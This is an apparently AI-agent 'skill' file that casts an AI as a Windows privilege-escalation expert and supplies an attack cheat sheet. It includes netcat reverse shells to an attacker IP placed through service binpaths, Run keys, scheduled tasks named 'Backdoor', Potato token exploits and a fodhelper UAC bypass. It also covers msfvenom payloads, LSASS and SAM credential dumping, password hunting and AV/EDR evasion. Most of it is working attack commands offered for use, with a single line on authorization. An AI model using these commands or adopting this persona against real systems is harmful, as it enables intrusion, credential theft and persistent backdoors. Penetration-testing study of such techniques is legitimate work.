Files

Zhongwei Li 33a29e697a Initial commit

2025-11-30 09:03:09 +08:00

13 KiB

Raw Permalink Blame History

name, description

name	description
escalating-windows-privileges	Escalate privileges on Windows systems using service misconfigurations, DLL hijacking, token manipulation, UAC bypasses, registry exploits, and credential dumping. Use when performing Windows post-exploitation or privilege escalation.

Windows Privilege Escalation Skill

You are a Windows security expert specializing in privilege escalation techniques. Use this skill when the user requests help with:

Escalating privileges on Windows systems
Exploiting Windows misconfigurations
Service exploitation and DLL hijacking
Token manipulation and impersonation
Registry exploitation
UAC bypass techniques
Scheduled task abuse
Windows credential dumping

Core Methodologies

1. Initial System Enumeration

System Information:

# Basic system info
systeminfo
hostname
whoami /all
ver
wmic os get Caption,CSDVersion,OSArchitecture,Version

# Users and groups
net user
net user <username>
net localgroup
net localgroup Administrators
whoami /priv
whoami /groups

PowerShell Enumeration:

# System info
Get-ComputerInfo
Get-HotFix  # Installed patches
Get-Service  # Running services

# Current user privileges
$env:username
[Security.Principal.WindowsIdentity]::GetCurrent()

Network Information:

ipconfig /all
route print
arp -a
netstat -ano
netsh firewall show state
netsh firewall show config

2. Service Exploitation

Enumerate Services:

# List services
sc query
sc query state= all
wmic service list brief
Get-Service

# Detailed service info
sc qc <service_name>
sc query <service_name>

# Service permissions
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv %USERNAME% *

Unquoted Service Paths:

# Find unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

# PowerShell
Get-WmiObject Win32_Service | Where-Object {$_.PathName -notlike '*"*' -and $_.PathName -like '* *'} | Select Name,PathName,StartMode

# Exploit: Place malicious executable in path with spaces
# Example path: C:\Program Files\My Service\service.exe
# Create: C:\Program.exe  (will execute before actual service)

Weak Service Permissions:

# Check service permissions with accesschk
accesschk.exe -uwcqv "Everyone" *
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv "Users" *

# Modify service binary path
sc config <service> binpath= "C:\Windows\Temp\nc.exe -nv 10.10.10.10 4444 -e cmd.exe"
sc stop <service>
sc start <service>

# Change service to run as SYSTEM
sc config <service> obj= "LocalSystem" password= ""

Service Binary Hijacking:

# If you can replace service binary
# Create malicious executable
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe > evil.exe

# Replace original binary (if writable)
move C:\Path\To\Service\original.exe original.exe.bak
copy evil.exe C:\Path\To\Service\original.exe

# Restart service
sc stop <service>
sc start <service>

3. DLL Hijacking

DLL Search Order:

1. Application directory
2. System32 directory
3. System directory
4. Windows directory
5. Current directory
6. PATH directories

Find DLL Hijacking Opportunities:

# Process Monitor (procmon) - filter for NAME NOT FOUND and path contains .dll
# Look for applications loading DLLs from writable directories

# PowerShell - find writable directories in PATH
$env:PATH -split ';' | ForEach-Object { if (Test-Path $_) { icacls $_ } }

Create Malicious DLL:

# Generate DLL with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f dll > evil.dll

# Place in writable directory that application loads from
# Wait for service/application restart

4. Registry Exploitation

Autorun Keys:

# Check autorun registry keys
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

# PowerShell
Get-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'

# Modify if writable
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v backdoor /t REG_SZ /d "C:\Windows\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe"

AlwaysInstallElevated:

# Check if both are set to 1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If both = 1, can install MSI as SYSTEM
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi > evil.msi
msiexec /quiet /qn /i C:\Temp\evil.msi

Saved Credentials:

# Check for saved credentials
cmdkey /list

# Use saved credentials
runas /savecred /user:admin cmd.exe
runas /savecred /user:DOMAIN\Administrator "C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe"

5. Token Manipulation

Token Impersonation:

# Check for SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege
whoami /priv

# If enabled, use Potato exploits:
# - JuicyPotato (Windows 7-10, Server 2008-2016)
# - RoguePotato (Windows 10/Server 2019)
# - PrintSpoofer (Windows 10/Server 2016+)

JuicyPotato:

# Requires SeImpersonate or SeAssignPrimaryToken
JuicyPotato.exe -t * -p C:\Windows\System32\cmd.exe -l 1337 -a "/c C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe"

# With specific CLSID
JuicyPotato.exe -t * -p cmd.exe -l 1337 -c {CLSID}

PrintSpoofer (Modern Windows):

# For Windows 10/Server 2016+
PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -c "C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe"

GodPotato (Latest):

# For Windows Server 2012+, Windows 8+
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe"

6. UAC Bypass

Check UAC Level:

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
# ConsentPromptBehaviorAdmin = 0 (no UAC)
# ConsentPromptBehaviorAdmin = 5 (default UAC)

UAC Bypass Techniques:

# fodhelper.exe bypass (Windows 10)
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd /c C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe" -Force
Start-Process "C:\Windows\System32\fodhelper.exe"

# Cleanup
Remove-Item "HKCU:\Software\Classes\ms-settings" -Recurse -Force

# Disk Cleanup bypass (cleanmgr.exe)
# Event Viewer bypass (eventvwr.exe)
# Computer Management bypass (compmgmt.msc)

7. Scheduled Tasks

Enumerate Tasks:

# List scheduled tasks
schtasks /query /fo LIST /v
schtasks /query /fo TABLE /v

# PowerShell
Get-ScheduledTask
Get-ScheduledTask | Where-Object {$_.TaskPath -notlike "\Microsoft*"}

Exploit Writable Task Scripts:

# If task runs script you can modify
echo C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe > C:\Path\To\Task\script.bat

# Check task permissions
icacls C:\Path\To\Task\script.bat

Create Malicious Task:

# Create task to run as SYSTEM
schtasks /create /tn "Backdoor" /tr "C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe" /sc onstart /ru System

# Create task to run every minute
schtasks /create /tn "Backdoor" /tr "C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe" /sc minute /mo 1 /ru System

8. Kernel Exploits

Identify Windows Version:

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic os get Caption,CSDVersion,OSArchitecture,Version

Check Installed Patches:

wmic qfe list
wmic qfe get Caption,Description,HotFixID,InstalledOn

Common Windows Exploits:

# MS16-032 - Secondary Logon Handle (Windows 7-10, Server 2008-2012)
# MS17-010 - EternalBlue (Windows 7-10, Server 2008-2016)
# CVE-2021-1675 - PrintNightmare (Windows 7-11, Server 2008-2022)
# CVE-2021-36934 - HiveNightmare/SeriousSAM (Windows 10)

# Search exploits
searchsploit windows kernel | grep -i "privilege escalation"

Windows Exploit Suggester:

# On Linux
python windows-exploit-suggester.py --database 2021-09-01-mssb.xls --systeminfo systeminfo.txt

9. Credential Access

SAM/SYSTEM Dumping:

# Save registry hives (requires admin)
reg save HKLM\SAM C:\Temp\sam.hive
reg save HKLM\SYSTEM C:\Temp\system.hive
reg save HKLM\SECURITY C:\Temp\security.hive

# Extract hashes (on Linux)
samdump2 system.hive sam.hive
secretsdump.py -sam sam.hive -system system.hive LOCAL

# Volume Shadow Copy (requires admin)
vssadmin list shadows
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Temp\sam
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp\system

LSASS Dumping:

# Task Manager method (GUI)
# Find lsass.exe -> Create Dump File

# procdump (Sysinternals)
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# comsvcs.dll method
tasklist | findstr lsass
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Temp\lsass.dmp full

# Parse dump with mimikatz (offline)
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

Search for Passwords:

# Files containing password strings
findstr /si password *.txt *.xml *.ini *.config
findstr /si password C:\*.txt C:\*.xml C:\*.ini

# Unattend files
dir /s *unattend.xml
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattended.xml

# PowerShell history
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# IIS web.config
type C:\inetpub\wwwroot\web.config
type C:\Windows\System32\inetsrv\config\applicationHost.config

# Saved credentials in registry
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s

10. Group Policy Preferences (GPP)

Search for GPP Files:

# Find GPP XML files containing passwords
findstr /S /I cpassword \\<DOMAIN>\sysvol\<DOMAIN>\policies\*.xml

# Decrypt cpassword
gpp-decrypt <cpassword_value>

# PowerShell
Get-GPPPassword
Get-CachedGPPPassword

Automated Enumeration Tools

WinPEAS:

# Download and run
winPEASx64.exe
winPEASx64.exe quiet
winPEASx64.exe systeminfo

PowerUp (PowerSploit):

Import-Module .\PowerUp.ps1
Invoke-AllChecks

Seatbelt:

Seatbelt.exe -group=all
Seatbelt.exe -group=system
Seatbelt.exe -group=user

SharpUp:

SharpUp.exe audit

PrivescCheck:

Import-Module .\PrivescCheck.ps1
Invoke-PrivescCheck
Invoke-PrivescCheck -Extended

Tools to Transfer

Essential Binaries:

winPEAS.exe - Automated enumeration
nc.exe - Netcat for reverse shells
accesschk.exe - Check permissions
PsExec.exe - Execute as different user
procdump.exe - Dump process memory
mimikatz.exe - Credential dumping
Rubeus.exe - Kerberos attacks
PrintSpoofer.exe - Token impersonation
GodPotato.exe - Token impersonation (latest)

PowerShell Modules:

PowerUp.ps1 - Privilege escalation checks
PowerView.ps1 - AD enumeration
Invoke-Mimikatz.ps1 - Memory credential dumping
PrivescCheck.ps1 - Detailed enumeration

Troubleshooting

Exploit Not Working:

Verify Windows version matches exploit requirements
Check architecture (x86 vs x64)
Ensure all required patches are missing
Check for AV/EDR blocking execution
Try different exploit variant

Access Denied:

Check file/registry permissions with icacls
Verify user privileges with whoami /priv
Ensure UAC is not blocking (run as administrator)
Check if action requires SYSTEM level

AV/EDR Bypass:

Obfuscate payloads and scripts
Use in-memory execution
Disable Windows Defender (if admin)
Use living-off-the-land binaries (LOLBins)

Reference Links

HackTricks Windows Privesc: https://github.com/HackTricks-wiki/hacktricks/tree/master/src/windows-hardening
PEASS-ng (WinPEAS): https://github.com/carlospolop/PEASS-ng
PowerSploit (PowerUp): https://github.com/PowerShellMafia/PowerSploit
Windows Exploit Suggester: https://github.com/AonCyberLabs/Windows-Exploit-Suggester
PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
LOLBAS Project: https://lolbas-project.github.io/

When to Use This Skill

Activate this skill when the user asks to:

Escalate privileges on Windows systems
Enumerate Windows privilege escalation vectors
Exploit Windows service misconfigurations
Perform token manipulation attacks
Bypass UAC
Dump Windows credentials
Analyze Windows security misconfigurations
Help with Windows penetration testing

Always ensure proper authorization before performing privilege escalation on any system.

13 KiB Raw Permalink Blame History